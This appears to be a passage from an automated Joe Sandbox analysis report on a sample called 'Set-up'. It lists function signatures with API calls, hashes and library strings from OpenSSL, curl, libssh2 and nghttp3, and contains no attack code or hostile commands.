                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: memcpy$__acrt_iob_func_errnofflushstrlen
                                      • String ID: vtls/vtls.c
                                      • API String ID: 1294796744-169717415
                                      • Opcode ID: 895c914d600930c625cd72acb6253817cd4a1cd598d9232e49c89f4d9ba4a2c4
                                      • Instruction ID: fcb8b876d205802443e27624c985cccec861b54c2d44fcde3cca6cb8d32ae281
                                      • Opcode Fuzzy Hash: 895c914d600930c625cd72acb6253817cd4a1cd598d9232e49c89f4d9ba4a2c4
                                      • Instruction Fuzzy Hash: 39A19171B40707ABE7208F6AD945B22BFE8BF44744F094538E918DB682FB75F9508B90
                                      APIs
                                      • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000000), ref: 0069E9A3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID: $BN_lshift$crypto/bn/bn_shift.c
                                      • API String ID: 2221118986-2228461501
                                      • Opcode ID: 66af2d60716df51bee50d3516b0bb557ed9987a772d3b9c57f74877181739ed4
                                      • Instruction ID: e5d11d77ed4f1b8908265da7ce71360f80333b64fe05c287a0cb698b62135b0a
                                      • Opcode Fuzzy Hash: 66af2d60716df51bee50d3516b0bb557ed9987a772d3b9c57f74877181739ed4
                                      • Instruction Fuzzy Hash: B671E031A087108BCB15DF29C88062AF7A6EFDA310F04872EFDA967791D771AC02CB41
                                      APIs
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,006C05BF,00000000,00000000,input), ref: 00714986
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,?), ref: 007149D4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: memcpystrlen
                                      • String ID: crypto/property/property_string.c$ossl_property_string
                                      • API String ID: 3412268980-3682758481
                                      • Opcode ID: 61237aecaae8f48d4c5494b05fed69c352eff75f6e538e5962734e0a3f8deace
                                      • Instruction ID: 4b49e3174cc2e37457f6159e564b6867ea4d7d67bd3bf307797d04f014d22b2a
                                      • Opcode Fuzzy Hash: 61237aecaae8f48d4c5494b05fed69c352eff75f6e538e5962734e0a3f8deace
                                      • Instruction Fuzzy Hash: 6B5128B6D443057BD7617B28AC03F6B76999F10718F080038FD48932A3FA66FA50C796
                                      APIs
                                      • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0070662C
                                        • Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7262
                                        • Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7285
                                        • Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72C5
                                        • Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72E8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strcpystrlen$memcmp
                                      • String ID: crypto/ocsp/ocsp_vfy.c$ocsp_match_issuerid
                                      • API String ID: 1653033214-3047229099
                                      • Opcode ID: 2a8db3038b562615d65aa3dd13a1822186415196705b46cb3c04c0420c570b33
                                      • Instruction ID: 195c09231daec0671de8acad9625b5c378d2a144f73a244ed757030e6b50bfdd
                                      • Opcode Fuzzy Hash: 2a8db3038b562615d65aa3dd13a1822186415196705b46cb3c04c0420c570b33
                                      • Instruction Fuzzy Hash: 51411BA5A44301F7E65035702C9BF6B31C9CF55758F18063CFE099A2D3FA99DA3482AB
                                      APIs
                                      • EnterCriticalSection.KERNEL32(?), ref: 005D8769
                                      • SleepConditionVariableCS.KERNEL32(?,?,000000FF), ref: 005D87D1
                                        • Part of subcall function 005D88B0: QueryPerformanceFrequency.KERNEL32(?), ref: 005D88C1
                                        • Part of subcall function 005D88B0: QueryPerformanceCounter.KERNEL32(?), ref: 005D88CC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: PerformanceQuery$ConditionCounterCriticalEnterFrequencySectionSleepVariable
                                      • String ID:
                                      • API String ID: 3112449238-0
                                      • Opcode ID: 584a72cbba2518a1ec90bdaacd76e728278bcc5a19e3a8597ff01f2917bf07d9
                                      • Instruction ID: 60af183fa16be873d01b282035996c580a7fb0cea45be6fa9f9847a023854a08
                                      • Opcode Fuzzy Hash: 584a72cbba2518a1ec90bdaacd76e728278bcc5a19e3a8597ff01f2917bf07d9
                                      • Instruction Fuzzy Hash: 6331DAB2B00202ABE7149A79DC46B7A7B68FB80350F54493EEC16D7291DF31ED14D791
                                      APIs
                                      • GetLastError.KERNEL32(006C7CCC,?,00000000,006C7127,006C7CCC,00000000,006ECAB7,00511A70), ref: 006C60E3
                                      • SetLastError.KERNEL32(00000000), ref: 006C61A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: ErrorLast
                                      • String ID: crypto/err/err.c$crypto/err/err_local.h
                                      • API String ID: 1452528299-2963546075
                                      • Opcode ID: 28075e61e322f0b122cbe1e21ba9ea9feee90de071975bb66f0b458ac9e8df1e
                                      • Instruction ID: 2d49dea81488f132763645474f6b73fb2a0bd8da26e47a74e01fb889ab22a8a0
                                      • Opcode Fuzzy Hash: 28075e61e322f0b122cbe1e21ba9ea9feee90de071975bb66f0b458ac9e8df1e
                                      • Instruction Fuzzy Hash: D531E7B5A4070276E7612F2CEC47FB63352FB4471DF040238FA14552E7E7B9A924CAA9
                                      APIs
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00540646
                                        • Part of subcall function 005FF340: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,005400B0,?,?,00000000,00000000,?), ref: 005FF35D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _time64strlen
                                      • String ID: Attempt to set SFTP stats failed: %s$Unknown error in libssh2$vssh/libssh2.c
                                      • API String ID: 3014104814-2439779272
                                      • Opcode ID: dd38fa39c95ff5ce1dc7599d00938c67984e1948876b4bcaf05674b66d141754
                                      • Instruction ID: d42e1db1e233b8d5e9fb85fe83c982b0117aa39277a0ed33fd6be3cd595ba895
                                      • Opcode Fuzzy Hash: dd38fa39c95ff5ce1dc7599d00938c67984e1948876b4bcaf05674b66d141754
                                      • Instruction Fuzzy Hash: 1B31F1B1A04605AFD3119F18D845BAAFBE5BF88328F044528F5584B3A2E371BA14CB82
                                      APIs
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00540594
                                        • Part of subcall function 005FEE30: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 005FEE4F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _time64strlen
                                      • String ID: Unknown error in libssh2$mkdir command failed: %s$vssh/libssh2.c
                                      • API String ID: 3014104814-3060469362
                                      • Opcode ID: ea1641e12aef93b6feb4860bf7a20684752f7bd2055bbcb08812f034d37a9a88
                                      • Instruction ID: a9b4c832e6c8a9cb9794105217fc53e47767f6eb0642602b703a543f73d71384
                                      • Opcode Fuzzy Hash: ea1641e12aef93b6feb4860bf7a20684752f7bd2055bbcb08812f034d37a9a88
                                      • Instruction Fuzzy Hash: C121D8B5A04305AFD311DF68D88569AFBE5BF88324F044568F5588B352D371ED14CB92
                                      APIs
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,006871DD,00000000,?,?), ref: 006844AC
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000,?,?,?,?,?), ref: 006844FF
                                        • Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7262
                                        • Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7285
                                        • Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72C5
                                        • Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72E8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strlen$strcpy$memcpy
                                      • String ID: ASN1_STRING_set$crypto/asn1/asn1_lib.c
                                      • API String ID: 1223016426-1431402185
                                      • Opcode ID: f383c61a8b7468bd2bc50d20e5554185f61ef23cd06ba2928eb0de50d2094e03
                                      • Instruction ID: cf7c3ce326659d4627635e7661ad575fa144bd1e99fefb6afbfd21cebc15c2c8
                                      • Opcode Fuzzy Hash: f383c61a8b7468bd2bc50d20e5554185f61ef23cd06ba2928eb0de50d2094e03
                                      • Instruction Fuzzy Hash: 5111E6716043125BD7207D649841B6B76DADB51725F1902A9FD19AB3C2EE61DC0087F2
                                      APIs
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - pbuf->last) == len,nghttp3_qpack.c,00000978), ref: 005BC4E7
                                      Strings
                                      • (size_t)(p - pbuf->last) == len, xrefs: 005BC4E2
                                      • nghttp3_qpack.c, xrefs: 005BC4DD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _assert
                                      • String ID: (size_t)(p - pbuf->last) == len$nghttp3_qpack.c
                                      • API String ID: 1222420520-3384106985
                                      • Opcode ID: d760477a17c8f63967d7db553bcdac3503e653b98262edcbeef4525c13ea46df
                                      • Instruction ID: a0b89264e98d510ca8a8d5a920ba7ff9af4163ae57d19a5fe02b1fee843c30a1
                                      • Opcode Fuzzy Hash: d760477a17c8f63967d7db553bcdac3503e653b98262edcbeef4525c13ea46df
                                      • Instruction Fuzzy Hash: 6281C571A083009FD7049E2CC89076ABBD2FBD9714F548A7CF9998B3D2D675EC448785
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9bb912b9a000b708f7402aac0e254db19abf290027456a00c8c7cb84079dfeef
                                      • Instruction ID: 78dbe89598b7abcd9dd3f9c1c40e07e461296c9be9aa853cc6a3eb71e062d0f1
                                      • Opcode Fuzzy Hash: 9bb912b9a000b708f7402aac0e254db19abf290027456a00c8c7cb84079dfeef
                                      • Instruction Fuzzy Hash: 87D19EB2508205BFDB00AF58DC45E6BBBAEEFC5354F49482CF94553212E631ED15CBA2
                                      APIs
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - rbuf->last) == len,nghttp3_qpack.c,000004D0,?,?,?,?,?,?,005BB434,?,?,00000000,00000000,?,?), ref: 005BC68A
                                      Strings
                                      • (size_t)(p - rbuf->last) == len, xrefs: 005BC685
                                      • nghttp3_qpack.c, xrefs: 005BC680
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _assert
                                      • String ID: (size_t)(p - rbuf->last) == len$nghttp3_qpack.c
                                      • API String ID: 1222420520-2159148421
                                      • Opcode ID: 0040304b9f84921b93786772093c65ced34c0c76f610628c298672ab3ae28409
                                      • Instruction ID: 78e90d7c2609522e7e09fd906f07b234688a0dfe5847cd8bba5db6433cb3d156
